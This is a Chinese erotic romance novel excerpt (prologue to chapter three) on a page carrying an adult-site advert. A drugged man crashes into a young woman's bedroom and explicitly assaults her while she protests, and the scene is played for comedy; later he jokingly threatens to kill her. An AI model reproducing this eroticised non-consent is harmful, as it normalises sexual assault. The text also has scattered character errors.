返回

恶男的情宠全bf6

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

恶男的情宠


字数:59213字
TXT包:(53.72KB)(53.72KB)
下载次数:8



楔子

呜……怎么会这样?怎么会让她遇到……遇到……那种东西?

她箫融融天不怕、地不怕,怕的就是所有的鬼魅一族!

难道她平常烧香拜佛、上教堂祷告都没有用吗?为什么、为什么居然会从天外飞来一个男人……不,是一个男鬼……也不是……他可能是个男殭尸……啊……搞不好都不是……

反正,他不是人就是了!

飞来一个不是人的东西也就罢了!这个不是人的东西居然还吻她的唇想吸她的精气?啃她的脖子想喝她的血?

更可怕的是,他可能很想附身在她身上,竟然还狂压猛压她一番?呜……她不要被附身啦!

呜,谁来救救她,脱离这个恶魔的手掌心啊?

偷拐抢骗,四大恶人。

从何而来,无人知晓。

行踪飘忽,无影无踪。

人间色变,鬼见亦愁!

聆听着世人的传诵,黑衣人缓缓漾出一个邪魅的笑容。

「偷」、「拐」都去了,那这回换谁呢?自然是抢了!

不过,抢这人性子比较烈,可能不会那么轻易听他的指令。看来,多费些心思在「枪」身上,是必然的了!

你必定对我下了魔咒教我在茫茫人海中只为追逐你的身影前行。

第一章

冷眼睨向从天而降的灰白色纸笺,黑耀岩墨眸中的炽火一闪。

不屑看那信笺,他漠然转过头。偏偏,此时狂风一起,将那飞旋的纸笺吹至他面前,他想不看清楚纸笺的内容都不行。

只见那张灰白色的纸笺上亮出几个字——至台湾阳明山此宅,居之。

旁边,附有的是那间宅子的外观照片。

阳明山?去他的鬼任务!他现在可是在度假!没人能动得了他!就算他那不知名的顶头上司也休想!

彻底将那纸笺撕个粉碎,黑耀岩随手一扔,纸片随风飞舞着,终至于散落一地。

扯开唇角,黑耀岩淡淡地笑了。迈开步伐,在离去的同时,他的步子狠狠地踩在那些碎纸片上。

淡淡烟尘自被他踩扁的纸片飘然而出。

「该死。」感觉到一股异味迅速窜入鼻端,黑耀岩恨恨地咒了声,下一刻,身体立刻瘫软。

意识逐渐模糊之际,他又咒了数声。那不知名的头头居然早料到了他不肯听命,而拿这一招来硬架他的人?

该……死……

颀长的身躯从昂然到颓倒,不过短短几分钟。伴在倒下的俊美男人身边的,唯独隐隐约约中闪着透亮的灰白碎纸片。

「啊,关窗户、关窗户!」打算就寝的箫融融神经质地一再检查着整栋房子的门窗是否关得密不通风。

「居然忘记开我自己房间的落地窗,真是笨死了!」萧融融捶了捶自己的脑袋瓜,趋前准备把自己房间的落地窗给锁好。

突地,天外飞来一物。

箫融融眨了眨美眸,瞪着那突然之间直直朝她飞过来的物体,丝毫没有任何闪躲能力地呆立在当场。

以迅雷不及掩耳的速度飞来的物体,就这样在箫融融发着愣的同时,完全撞向她。

天外飞来的物体冲击力实在太强,箫融融整个人被弹飞而出,正巧落在软软的床垫上,而那物体,正巧压在她身上。

「啊——」萧融融失声尖叫。「啊──」她下意识地使力想要推开那物体,随即发现根本没用。

那物体,沉甸甸的、满有几分重量、好象还会动……箫融融瞪大了水灵明眸,仔细地望着压在自己身上的物体。

下一秒钟,箫融融的惊声尖叫立刻响透整栋屋子。

「是人……不……不是人……这这这……」压在她身上的是个长得像男人的东西……问题是这东西究竟是不是人?

她不晓得!根据这东西飞过来的架势,可能不太能归属于人类!啊……这究竟是什么?

「唔……」还在纳闷的同时,她的唇突然被某样物体堵住!睁大眼睛一瞧,箫融融这才发现,那样物体,竟是身上那具有庞大身躯者的唇!

他……他在做什么?

他他他……他不只堵住她的唇,他的舌头居然还在她的嘴里头动来动去?不但如此,他他他……他还吸她的嘴?这……他究竟想要做什么?

箫融融在唇齿缠绵问,感觉到呼吸困难,力气全然告罄。

糊成一片的脑中突生某一念头,她奋力地推开身上的重物,但她那绵软的力气根本撼动不了他,尤如螳臂挡车一般。

好不容易,身上的重物终于放开了她!

「啊——不要吸我的精气啊!」箫融融扯声大嚷着,对身上的重物求饶。「拜……托你……」

黑耀岩的意识,是在飞弹在一个女人身上之后复苏的。

醒来的时候,他霎时明白,他中毒了!这个毒大概是具有什么春药催情的效力吧!

因为他完全无法控制自己的举动,疯狂地想要眼前这个女人!热……一种全然无法抵挡的热……

意识虽清明,但是身躯却不受他控管,他封住了眼前女人的唇。

甜滑香软。虽然是自身难以掌控之下的索吻,他仍然尝得出眼前这女人那甜软的唇以及她特有的清芬。

离开了她的唇,澎湃的欲望正促他继续探索她的一切,他耳里突然传来她的嚷声。她在叫什么?不要吸她的精气?

黑耀岩原己蓄势待发的身躯突然间僵直了几秒钟。

「我不是在吸你的精气!」这蠢女人,居然把他的吻视为他在吸她的精气?有没有搞错?

就算是她的吻技青涩地一如初次接吻,也不应该把他吻她视为他在吸她的精气!

「啊……」箫融融眨了眨雾茫茫的眸子。「你明明就是在吸我的精气……我到现在都还呼吸困难!」

「你……」这女人有病!黑耀岩决定不予理会,开始动手剥着她的睡衣,打算就拿她当解毒品。

「你在干嘛……」萧融融使劲地拍打他为非作歹的大手,但是却难以阻挡他的动作。「你该不会是想要先吸光我的精气,再来啃我的肉,喝我的血吧?」啊,她果然遇到的不是人!

黑耀岩顿时又呈僵死状。「你以为我是谁?」他以他那双墨黑色的利眸狠狠地看着她。

「我怎么知道你是谁?」箫融融害怕得全身打哆嗦。「我唯一能确定的,只有你不是人!」

这蠢女人,竟敢骂他不是人?黑耀岩怒气一扬,她那尚未被他除尽的睡衣瞬间全成了破布片片。

箫融融望得目瞪口呆。这种神奇的功夫,人怎么做得出来?她甚至连心都还没有跳一下,她的睡衣就变成碎片了!

不是人,他真的不是人!

「你究竟是什么东西?」浑身打颤的萧融融,勉为其难地佯装出一副不怕他的模样。

「你竟敢问我是什么东西?」黑耀岩大手一扯,她的胸衣跟着脱离她发抖的娇躯。

怎么办?她面前的这个不是人的灵躯生气了!怎么办?

「我……求求你告诉我啊……」箫融融完全露出真面目,畏惧地哀求着他。「我真的很伯鬼……」

「鬼?」敢情她觉得他是鬼?黑耀岩正想做响应,汹涌的情欲却不容他如此,他发了狂似地啃着她细嫩的颈子。

唔,好痛!却又好酥好寐!箫融融被他这么一啃啮,霎时叫出声来。

「啊……」箫融融此时明白了。

「你……你是吸血鬼还是殭尸?要是殭尸的话,那我要暂时停止呼吸……要是吸血鬼……呜……我还不想死啊……求求你,饶我一命……我平时爱暍咖啡,血一定很苦不好喝……」

这女人在扯什么?黑耀岩停在她颈边的唇直直往上,封住她喋喋不休的唇,吞覆住她未出的话语。

他这样吸她的精力,害她都没有力气反制他了……呜……他可能不是吸血鬼也不是殭尸,而是她不认识的某种鬼!

而她,百分百肯定自己遇上鬼压床了。

「你不要压我!求求你这个鬼!」好不容易他离开她的唇了,箫融融立刻出声求饶着。「我会烧很多冥纸给你,这样你就可以去找你的同伴,爱压谁就压谁,不要压我……」

「鬼?」黑耀岩怒火狂烧。「我是鬼?」她究竟搞不搞得清楚这是怎么一回事?

他己经气急败坏到想停下来跟她解释清楚的地步了,但难耐药力的催发,他如脱缰的烫热大掌不由自主地滑过她温腻的玉肤,来到她纤腰旁,一把揪下她的丝质底裤。

「啊……」萧融融意识到她全身上下都被扒个精光了,忙不断地挣扎着。「唔……」迷迷蒙蒙之间,箫融融直接把他愤怒的质疑声当作是他的肯定。「你看吧,你果然自己承认自己是鬼了吧!」

呜,她怎么会在三更半夜遇到一个男鬼?呜,她好可怜……

「我承认我是鬼?」黑耀岩的唇齿欺上她嫩弱的娇峰,在其上琢磨着。「我什么时候承认我是鬼了?

「刚刚啊。」难道鬼都做事又不买帐的吗?「啊……你不要……你该不会是想要附身在我身上,先要熟悉我的身体吧?」

老天,他弄得她好热啊……

一我?附身?」黑耀岩被她气得差点说不出话来。

一般女子遇到这种情形会怎么解读?她居然说他要附她的身?有没有搞错?
「对啊,求求你不要附我的身!」啊,他居然连大掌都一起抚上她的胸都来熟悉她的身体了。

「你一个大男人……不,是一个大男鬼附上我这小女人的身躯,是很辛苦的,你不知道吗?首先,你要先学会如何成为一个女人……再来,嗯,再来你要学什么?」箫融融想得非常认真。

她还在扯她的附身论?这蠢女人!

「我没有要附你的身!」黑耀岩抚触着她雪峰上发颤的娉婷粉蕊,嗄声驳斥道。

非关药力,这蠢女人的娇躯居然很合他的胃口!

闇眸中欲火烧得更旺,黑耀岩抚在她胸前的魔掌由轻抚转为使劲揉捏,惹得箫融融连声娇吟。

「嗯嗯……啊啊……」他的力气好大,似乎不把她的胸都连根拔除不甘心似的。

等等!箫融融想到了什么似地顿了一下,花审变色地嚷道:「你这样模我的胸都,该不会是想要施法把我的胸都拔起来,好让你附身在我身上时,可以比较像个男人吧?

「你!」她在扯什么?拔胸都?他的爱抚居然被称之为被胸都?这女人究竟有没有上过健康教育课?

怒不可遏之下,原已被催的欲火烧得更加炽热,一手按捏着她的酥胸,黑耀岩另一掌己直接抚向她逐渐湿润的幽谷运。

「啊……」他他他,除了想要把她的胸都拔掉,他还想做什么?。「唔……啊……」

箫融融突地吟叫出声。他……他竟然把他的手插进她的那里……他他他究竟是在做什么?

她好痛……又好热……全身都有一种很异样的感觉,唔……他一定真的对她施法成功了啦,怎么办?

「你该不会……」箫融融一边呻吟,一边困难地说道。「你该不会是想拿个填充物把我那里塞满,以为这样就可以伪装成男人的那个了吧?这样很小,我想女人不会满足的……」

「你不满足?」已经伸入长指在她狭长紧室花径间的黑耀岩差点气绝。他头一次听到女人这样说!头一次!

「不……不是……」箫融融痛苦地抽气。「我很满……你你……你可不可以出去?」

唔,他的手弄得她好痛……

「你以为我不想?」要是平常时候,他才不会想沾惹上她这种蠢过头的笨女人!虽然她的滋味实在是教人迷恋不己。

「那你不要附我的身了,好不好?你也不要用自己的手指在我身体里头想要伪装成男人的那个……那是没用的!就像是你想把我的胸都铲平一样,都是徒劳无功的,你难道不知道我这张脸长得很女性化吗?」箫融融听到他的话之后,大受鼓舞的吐了一大串话。

他实在是很想把她的话当耳边风,问题是……他第一次发现,面对一个笨女人,想要佯装平静是多么的难!

黑耀岩在她雪嫩娇躯内的长指狠狠一戳,直刺向她荏弱的花蕊,在其上兜转揉弄着。

「啊……」萧融融哀叫出声。「你不要以为在我那里动来动去,就可以把你的手指头接到我身体里头来,你那是白费心机……啊……」

哇哇,怎么办,她愈来愈热、愈来愈热了,等等她的魂魄会不会整个就被他给吸走了!

「我从来没有这样想过!」谁跟她一样白痴啊?「我更没有要附你的身!」他要是个鬼,这种笨女人的身,他也不屑附!

「可是你……」不然他的行径要怎么解释呢?努力想着的箫融融,突然灵光一闪。「啊,你该不会是想要采阳补阴吧?」

她是人为阳,他是鬼为阴,他想要采阳补阴吗?好可怕……她为什么会变成他的对象?

「谁跟你采阳补阴了?」这女人有完没完?黑耀岩焦躁地将长指从她身体中抽拔出来,开始解开自己身上的束缚。

「你啊!」箫融融一脸理所当然地望向他,在望见他的举动之后,娇颜立刻又写满畏惧。「啊……你你你……真的要采阳补阴吗?别找我……」她拚命地对他摇手。

「我没有要采阳补阴!」谁来告诉他这女人的脑袋里头究竟装了些什么东西?
「那那那……那你该不会是想……」箫融融的语声暂歇在她所看到的强大阵势之中。

「闭嘴!」黑耀岩十分肯定这女人接下来的话一定会让他气得七窍生烟,干脆先出声恐吓她。

他叫她闭嘴?她怎么能这样就束手就擒?那好象一点也没有为自己的生命而努力……

「你想跟我男女交媾以达到阴阳合体,对不对?」萧融融战巍巍地猜测道。「我告诉你……虽然我是处女没错,可是那样没办法让你增加什么功力,我不是古代那种有练过功夫的侠女,你要找可以去找别人!」

「处女?」黑耀岩斜斜挑眉。妈的,他从来不碰处女的,这次居然会栽在这种泰处女身上?

真是天杀的该死!

「啊。」箫融融感觉到他更往自己靠近,忙吓得继绩往后退开。「你该不会是听到我是处女,结果反而更想要和我阴阳合体吧?呜……我跟你说,处女真的没什么好稀奇的,不过薄薄一张膜而己……」

「你总算还有点常识!」黑耀岩嗤了一声,将她压在身下,决定速战速决地要了这个蠢女人。

「哈?什么叫我总算还有点常识?我本来就一直很有常识啊!」箫融融纠正他道。「只不过,我也一直很怕鬼,你不要碰我啦……」她使劲地扳离他,想要脱离他的箝制。

「我也很想不要碰你。」只不过他实在是身不由己,难耐药效强力的催发,他撑不了多久。

「那就不要碰啊!」呜,他明明就说他不想碰她的,怎么还一而再、再而三地靠过来?对了,她可以呼救,她怎么都没有想到?

正当萧融融准备呼救,而黑耀岩蓄势待发的同时,柳素颜在门外嚷道:一融融,你自己一人在分饰两角演戏吗?怎么那么吵?咦,对了,你会说腹语吗?我怎么都不晓得?」

继母大人!是继母大人!真是太好了!

「融融?怎么没声音了?会不会是在说梦话?可是说梦话还会一人分饰两角,这实在是太厉害!」柳素颜喃喃自语起来。「嗯,我应该要进去看看融融睡得怎么样,毕竟我是一个好继母。」

继母大人怎么在门外一直嘀咕那些有的没有的?怏进来救她啊!她身上的男鬼已经用他的那个在摩擦她的那里了啦!

「融融!」柳素颜终于推门而入。「融融,你——」柳素颜看到床上的景象,登时愣在当场。「啊,你们继续忙,我不打扰你们!」她说落说着,就要转身而出。

「继母大人!」箫融融急忙叫住她。「你不要走!快点来帮我把这个男鬼拉关,怏点!」

「男鬼?」柳素颜一脸莫名其妙。「我只看到一个男人,没看到男鬼啊,你要我拉谁?」

箫融融急着推开黑耀岩的大手忙指向黑耀岩。「就是他!」

这个男鬼怎么一点畏惧的心都没有?连继母大人都已经进房了,他还在那里动个不停?

咦,他的眼神好象有些涣散。

「可是他明明是个男人啊!」柳素颜还在疑惑着。

「唉唷,管他是男人还是男鬼,继母大人你快点帮我拉开他!」箫融融情急地嚷道。

「喔,好!」柳素颜这才行动,趋向前去,拉了一下黑耀岩。

奇异的事情发生了,柳素颜这么一拉,黑耀岩竟然整个人软而无力地瘫倒在箫融融身上,沉沉地睡去,彷佛刚刚的事情全都没有发生过一样。

「啊──」萧融融又尖声惊叫起来。

谁能告诉她,这究竟是怎么一回事啊?

第二章

「吵死了!」杜小曼枕在欧阳曜的臂弯里头,耳里一直传来大小不一的叫嚷声。「融融那女人究竟喊了几次见鬼了?」

融融难道不晓得,喊鬼来了跟喊狼来了的道理是一样的,喊多了就完全没人想理她吗?

「谁晓得。」欧阳曜完全感觉得到杜小曼的怒气。「你在这里睡一下,我先出去看看究竟是怎么一回事好了!」

「他是人。」柳素颜望了抢走萧融融一整张双人床的黑耀岩望了许久,终于有了这样的结论。

「他不是人啦!」萧融融还是坚持自己遇到的是非人类。「继母大人,你都没有看到他飞进我房里的样子,看到的话,你一定觉得他不是人!」

「可是他真的是人啊,有脉搏、有呼吸,不是人是什么?」柳素颜很坚决地认为他是人。

「他可能是某种妖精,修炼几千几百年化为人形也说不定。」萧融融开始懊恼自己刚刚怎么没想到这一点。

「是这样吗?可是他穿的衣服,好年轻耶!一点都不像是活了几千几百年的妖精!」柳素颜还是满腹疑惑。

「唉唷,这个不是这样看的啦!」萧融融正待教导继母时,敲门声中断了她的话语。

争论得正凶的两个女人一同望向门口。

「嗨!」俊美得不町思议的欧阳曜从门外推门而入,向两位半夜没睡觉,在争论床上昏死的究竟是什么的女人打招呼。

「咦?」欧阳曜看到床上的男人,眉头立刻皱起。这男人……他怎么会山现在这里?「他是?」他佯装成完全不如晓的模样。

「他是人。」柳素颜的回答直教人喷饭。

「他是妖精。」箫融融的答案也好不到哪里去。

「他明明就是人啊!」柳素颜非常坚持己见。

「他明明不是人!」萧融融的坚持也不下于柳素颜。

「他是人!」欧阳曜此话一出,立刻招来萧融融的美眸质疑。

「他哪是人啊?他明明就不是人!」萧融融反驳道。

「你看,他现在是不是在睡觉?」欧阳曜非常明白要如何把人拐得服服帖帖的道理。

「对啊。」萧融融点点头,不明白欧阳曜究竟要说些什么。

「如果他真是妖精的话,睡着会现出原形的。」欧阳曜一副自己非常懂的模样。

「真的吗?」萧融融纳闷道。

「真的啊!」欧阳曜一脸神秘。「我之前就见过……你要听听看我的经验吗?」他笑得很贼。

「不要、不要!」萧融融连忙摇手,不想要听欧阳曜的鬼经验。

「所以他是人!」欧阳曜飞快地下了这个结论。「你要是不信的话,我们可以趁他睡觉的时候把他搬去化验!」

「啊,不用了!」听欧阳曜这么一说,萧融融继续摇着手。化验?好可怕!等等要是化验出他是什么火星人还是什么复制人的,岂不也很可怕?她决定要作只小鸵鸟,以眼前能看到听到的为可相信的事实。「我相信你、我相信你,你不用搬他去化验了。」

「那就没事了,大家可以回房间睡觉了。」欧阳曜等不急要回房间抱着杜小曼进入美梦了。

「好。」柳素颜一看没什么事,也打算回房安寝。

「等等!」萧融融觉得还是有很多疑点并未解开。「喂,你们怎么说走就走?喂,回来啊!」

呜,谁能告诉她她的房间为什么会在三更半夜里飞进一个男人?然后那个男人还对她毛手毛脚?甚全现在还抢了她的床,正大做他的好梦?

为什么没有人顾虑到地内心的感受呢?呜,她好可怜……已经遇到这等半夜惊魂记了,还要在这里守苦有个男人的闺房?

往外奔去,萧融融决定出让这问被抢的卧房,今晚睡客房去!

在床上翻来覆去,萧融融一整晚都在思考,一个人怎么可能做到像非人类一般的高难度动作?

好吧,现在的她相信他是人了,问题是,他究竟是什么人?怎么可能那么厉害?

嗯,搞不好他是什么乩童或是灵媒之类的,当时被附身,所以才会做得到那超越人体极限的动作!

咦,这样想想似乎非常有道理,她决定要去试验他。听说猫狗是很灵的动物,反正也睡不着,地干脆去把后院的狗全部找来测试他!

蹑手蹑脚,萧融融从后院牵来三只大小不同的狗狗。

「杜鹃、杜南、肚子痛!起来!」萧融融完个不顾那三只睡得好梦正酣的狗狗,直接就把三只狗狗都给挖起来,带进室内到她的房门口。

一边顾好三只狗,她一边打开门。

「来,快进去,快进去!」萧融融开始进行她的测试计画,催促着三只狗快点进到她的房里去。

「汪汪汪!」身为台湾上狗的杜南首先发难,理也不理萧融融,迳自义跑回后院丈睡它的大头觉了。

「汪!」狼犬肚子痛还算有点良心,跑进房里一下,望见黑耀岩那张连恶魔看到都会敬畏三分的俊颜,连忙又奔出来,连叫数声之后,飞快撤退,直奔后院去睡回笼觉。

「呜。」仅剩的一只牧羊犬杜鹃以它那水汪汪的狗眼瞅视着萧融融,然后摇了摇头,整只狗蜷缩在萧融融身边发抖。

「你们都那么怕他?」有问题,这一定有问题!这三只狗平日都是生龙活虎的,何曾怕过人?

杜鹃频频点头。

「问你,杜鹃,里头的那个男人是不是有很强的灵力?」萧融融直接跟狗对话起来。

杜鹃又是点头。

「啊,我猜的果然没错。」萧融融紧接着问道:「那他晚上是不是因为被什么东西附身,所以才会对我做出那些事?」

杜鹃仍是点头。

「那——一问得正起劲的萧融融正待继续问下去,眼前倏然出现一张凶神恶煞的男人俊颜。「你——」

「呜——」杜鹃的哀鸣声顿时惊天动地的响起。

呜,它只不过是想睡个觉,女主人莫名其妙挖它起来,拉它来这里,对它叽哩呱啦一些它听不懂的人话也就算了,这下居然还行个男人来踩它?

呜,真是枉顾狗权,它好可怜啊!

吵死了!

这女人究竟在做什么?一大早就带着一群狗来扰他清梦还不够,这下子还直接跟狗对起话来?

她究竟哪根筋不对劲了?不但跟狗说话,还跟一只早就睡着的狗说话说得那么开心!她有没有搞错?

黑耀岩冷冷地瞪着眼前的女人,想要快速离开这个有她的鬼地方。

「你踩到杜鹃了啦!」萧融融使劲地推他,好不容易将他不动如山的身躯挪移了一些位置。

但杜鹃还是断断续绩地传出哀鸣。

「杜鹃?」黑耀岩瞪着地上那团颇为巨大的毛球。她把它叫杜鹃?有没有搞错?

就他以为,这是只狗,不是鸟也不是花吧?

「对啊!我那死去的继父姓杜,所以我们家的狗狗当然也姓杜啊!你都不晓得,这只狗的名字,还是我特别查书算笔书才取出来的呢!」萧融融非常骄傲地说道。

白痴。黑耀岩冷眼凝视菩眼前儿自得意起来的萧融融,完全不想理会她。「我要走了。」

迈开步伐,他打算尽速离开这个把狗当鸟叫的地方。

「等等!」萧融融向前拉住他。「你不要走!」好不容易才知道他有灵力之类的,她哪可能让他走?

「怎么?」黑耀岩淡淡挑眉。莫非这女人昨晚的抗拒全是假的,现在食髓知味,不让他离开了?

「你住在这里好不好?」萧融融朝他绽出嫣然灿笑,晶亮的眸中透出对他的希冀。

黑耀岩连回答都懒得回答她,使劲将她甩开,漠视她唇角那动人心魂的灿烂笑颜。

「喂,你不要走啊!」萧融融赶忙着又将他给拉回来。「你是不是灵媒还是巫师那一类的?或是你是乩童?不过那么帅的乩童,实在很少见……」说到最后,她自己又质疑起来了。

黑耀岩继续沉默不语。这该死的蠢女人,她怎么到现在都还满口的怪力乱神?
「你怎么不说话?」萧融融软声软语地哀求着他。「你回答一下我的问题好不好,不然我不晓得要怎么称呼你耶!」

她烦不烦?黑耀岩睨了满脸灿笑的萧融融一脸。

「黑耀岩。」他微微一顿,又添了一句。「你要好好去读读论语。」虽然他挺不屑那个中国的老人家,但是眼前这女人确实有回去重修的必要。

「啊?」萧融融愣了好丰晌,才恍然大悟他原来是在说他的名字。「你的名字也好有灵气的感觉,小过……」她非常纳闷一件事。「你为什么要叫我回去读论语啊?」

望着她那张白痴透顶的美脸许久,黑耀岩终于松口。「子不语怪力乱神。」要是他不说,她怕是一辈子都不会搞清楚!

「啊。」萧融融想了一想,好不容易领悟他要表达些什么。「唉唷,我跟你说,那个老人家,根本就是因为自己太害怕,所以才要大家都不敢讲。我才跟他不一样呢!害怕就要勇敢面对,我就是怕鬼,怎样?」

黑耀岩蓦地又觉得自己太多话,以至于给她过多的接话空间。不打算再理会她,他再度甩开她,准备离开。

「喂,你不要走嘛!」萧融融今天非留下他不可。

「我看连狗狗都怕你,鬼一定也很怕你,你就留下来,帮我驱鬼嘛!至少照昨夜的情形看来,鬼都会跑到你身上去,那我就可以在一旁乐得没事……」
驱鬼?他还避邪咧!

黑耀岩冷硬着一张脸,完全不给她好脸色看。踏开步子就要闪人。

「喂,你不要那么无情嘛!你是不是觉得这里鬼很多,鬼影幢幢的,所以不打算留下?」萧融融死命黏着他。

「你——」什么鬼来鬼去的,她难道就没有别的话好说吗?黑耀岩冷睨向她,体内却突地涌上一股躁气。

头昏目眩。

他当下虚软在她的黏人阵势之中,直到感觉到她的体温,他那突来的燥热之气才一点一滴地消除。

「你怎么突然不说话,而且还一副那么虚弱的模样?」萧融融大吃一惊,连忙扶好他。「该不会是你感应到这里有鬼吧?」

「找……」他妈的,他究竟中了什么毒?「我要看医生!带我去!」他以火爆而命令的口吻说道。

「医生?干嘛看医生?」萧融融非常疑惑。「你会感应到有鬼,应该是你特殊体质的关系,我想你休息一下就会好了吧。」

「少废话!」黑耀岩因身体不受控制,莫名地焦躁不安。「带我去一个地方看医生,快!」

「好是好啦!」萧融融决定耍小人。「可是你要答应我留下来,我才要带你去。」

漠然地望着她,黑耀岩不置可否。他要走,没人留得住!

「不讲话就是默许罗!」萧融融自行解读道。「太好了,我现在就开车带你去看医生。」

耶,有人可以来帮她感应鬼,帮她吓退鬼了,真好!

「这是什么鬼地方啊?」萧融融依着黑耀岩的指示,开车开到一个她完全陌生的地方。「这里明明没有什么医院,你怎么不让我开车带你去台大医院?该不会是你觉得那里死灵太多,你会感应太强吧?」

黑耀岩淡淡瞥了她一眼,把她的话听若罔闻,迳自下车,留下萧融融一个人在车内。

「喂,你等等我啊!」萧融融连忙下车猛追他。「你没事干嘛走那么快?跟飞的没什么两样!」

这男人该不会又被附身了吧?哇,好町怕……她要不要干脆不要追,任由他被附身扰算了?

咦,不行,她就是要巴黏着他,这样只要她和他在一起,所有的妖魔鬼怪都会黏到他身亡,而地就会平安无事了!

「黑耀岩,你等等我啊!」

「我究竟他妈该死地被下了什么毒?」黑耀岩烦躁地以细长的手指爬梳着头发。

「岩,你似乎很生气。」黑耀岩的对面传来男子的轻笑声。那个男子,有着满头银色的发丝,就连一双眸子,都闪着异常的亮银。

「别评论我,快把我医好!否则我的怒气一发,很有可能把你这里给炸掉。」黑耀岩出言威吓着。

「治不好。」银发男子气定神闲地摊了摊手,完全没有被黑耀岩给吓坏的迹象。

「洽不好?怎么可能?」黑耀岩冷冷一笑。「别告诉我你那神医的名号是封假的!」

银发男人唇边噙着冷笑。「真真假假,假假真真,也许那真的是假的也说不定。」

「你——」黑耀岩怒极反笑。「你真的不准备说吗?」他唇边亮着阴狠的笑容。「如果不说,那……」他笑容转为威胁。

「女人。」银发男子神情未变,只是淡淡地笑着吐出这两个字。「唯有那个女人能治你。」

他凝向监视器里那个正探头探脑的女人。

「那个蠢女人?」黑耀岩睑色微变。「为什么?」

「她是你清醒过来第一个看到的女人,对不对?」银发男子笑问。

「对又怎样?」黑耀岩不解。

「你身上中的毒在第一次发作时,会让你欲火焚身,想要得到她。除非有第三者介人来阻止你的行为。」银发男子满意地望着黑耀岩愈来愈深沉的墨黑色瞳眸。「再来,你身上的毒会不定时地发作,症状就如同你感受过的,燥热昏眩乃至瘫软,除非你碰到那个女孩,才会好转,所以,我说只有她能治你。」

「这是什么鬼毒?」黑耀岩气急败坏的吼道。

「这是无药可医的毒。」银发男子薄唇泛出无奈浅笑,摊了摊手。「恕我无策,你只能等三个月,让药力全部消褪。」

「去他的!」这不就代表,他要跟那个女人绑在一块儿?黑耀岩气闷地甩头就走,连句谢谢都没有。

「怎么这样就走了呢?」银发男子唇畔笑意更深。「我还有件事没有跟你说呢!」

那毒,是无药可医没错,但是只要黑耀岩要了那个女孩……算了,看样子,他对那个女孩是深恶痛绝哪!

「你究竟在看什么医生啊?」看到黑耀岩一脸无表情地走到自己面前,萧融融忧心仲忡地问道。

「庸医。」黑耀岩没好气地答道,为了自己即将跟眼前这女人时时刻刻相处在一起而感到悲哀至极。

「是吗?我就跟你说啦,来这地方是不会有什么好医生的,你就不听!来,我现在开车送你到台大医院去!」萧融融善意至极地连忙要开车转赴他处看诊。「不过,你到底得了什么病,我怎么完全看不出来你有病啊?」

「我——」只有这个白痴女人能救他是吧?黑耀岩俯视着面前的女人好半晌,唇边缓缓露出冷凝的笑容。「我实在很想知道,直接把你给杀了,会有什么样的结果?」

「杀我?为什么要杀我?」萧融融满头雾水。「我可没有对不起你,那些鬼魂会附你的身,也不是我驱使来的,你不要杀我啊!」

「你会怕死?」黑耀岩低声笑厂出来。

「当然会啊!」萧融融用力地点头。「我还有很多事想做,可不想要那么早就死!」

「是这样吗?」黑耀岩唇边的笑邪佞得让人着魔。

「对啊,喂,你刚刚那句话只是在开玩笑的,对不对?」萧融融仰起精致的脸蛋,认真地问着他。

「你以为呢?」这女人,表情怎么能够蠢到这种地步?他从来没有在任何一个女人睑上见过这样蠢透了的真诚表情。

「我想应该是吧,因为我应该不会惹你讨厌才对。」萧融融对他漾出了一个勾人心魂的娇笑。

「你的想象力还真是他妈的丰富。」淡淡答完话,黑耀岩旋即钻入车中,甩上车门。

「啊?!」萧融融刹那间又呆愣住了。

想象力丰富和她刚刚说的那些话有什么关系啊?这男人的脑袋会不会闪为常常要跟那些东西打交道,所以有点小正常?这样想起来,她留住他好像还是有那么点可怕耶!

唉唷,不管了,反正先留下他再说!其它的事,她懒得想太多了。

第三章

「让这个男人住进家里?」杜小曼斜眼冷觑着萧融融。「这究竟是怎么一回事?」

「就是啊……昨天晚上我要去关窗户的时候,从外头飞进来—个男人……不对,那个时候我还不觉得那是个男人……」萧融融在回想着与他见面的离奇经过。
「你干嘛拉拉杂杂地说这一大堆?要说就说重点!」札小曼翻了翻白眼,命令道。

「是你问我这究竞是怎么一回事的啊!」萧融融满脸委屈。「所以我只好从一开始告诉你……」

杜小曼差点没被萧融融气昏。融融难道不知道,她所谓的要问怎么一回事,就是要听重点吗?

「那现在,说重点!」杜小曼再次下令。

「好。」萧融融乖顺地点了点头。「重点就是,这个男人可以为我挡掉很多的妖魔鬼怪,所以我想留他住下来。」

「真有这样的事?」杜小曼瞥了那个紧闭尊口,半句话都不吭的黑耀岩一眼。在看到他那张俊美却带有戾气的容颜时,得到了解答。

「对啊!」萧融融拚命点头。「小曼,反正我们家现在那么有钱,钱大概让我们花十辈子也花不完,多收留一个男人又不会怎么样,你就让他在这里住下来嘛!」

「如果你以后喊「鬼来了」的次数少一些,那我倒是不反对他在这里住下来。」杜小曼松口。

「真的吗?」萧融融喜出望外。「有他在,我相信我碰到鬼的机率会变很少,就算碰到,他也一定有能力帮我解决的,所以若是他住在这里,我以后一定会很少喊有鬼。」

「喔?」杜小曼半信十疑。「这可是你说的,你得给我记住,否则这个男人什么时候会被我逐出家门,我可不敢保证。」

「那就是你同意让他住下来了?」箫融融兴奋地问道。

杜小曼凝视着萧融融,缓缓地点了点头。「人是你带回来的,你现在就去打扫客房。」

她得支开融融,单独跟这男人谈上几句话,探探他的来历。家中最近接二连三来的男人,一个个都出色无比。

这个男人搞不好也是有某些目的才会潜进来这里的,就像她的欧阳一样。
「好。」欣喜若狂的萧融融旋风似地转往客房打扫起来了。

「你好。」杜小曼走到黑耀岩面前,对他露出礼貌性的微笑。

黑耀岩微扯唇角,露出一个似笑非笑的表情。

「你看来不太屑我那同母异父的姊姊。」杜小曼从他望着萧融融时,唇边那鄙夷的笑,可略知二一。

「这不关你事。一这女人的笑容太虚伪,一点都不像那个蠢女人那样真诚无伪……他在想什么?

「你还真冷淡。」这男人感觉起来,也不是省油的灯。「这位根本不会驱魔的先生,你怎么可以对一个留你下来的人那么冷淡呢?」

看来她不像那蠢女人一样笨到无可救药,然而,此时此刻,他竟然觉得那个蠢女人可爱多了。「你不留我也可以。」他唇畔徐徐泛出冷笑。「我会直接带走令姊的。」

「啊?」杜小曼亢是诧异了一下他的行动力,而后笑脸对他。「如果你真的要带走她,那我求之不得。」

「看来那女人还真不是普通的没人缘。」黑耀岩淡淡地下了评论,发现自己在嗤笑的同时,竟然有些同情起她了。

同情,一种他从来没用在女人身上过的情绪,居然让他在想到一个蠢女人时油然而生?

一定是因为她太蠢了!一定!

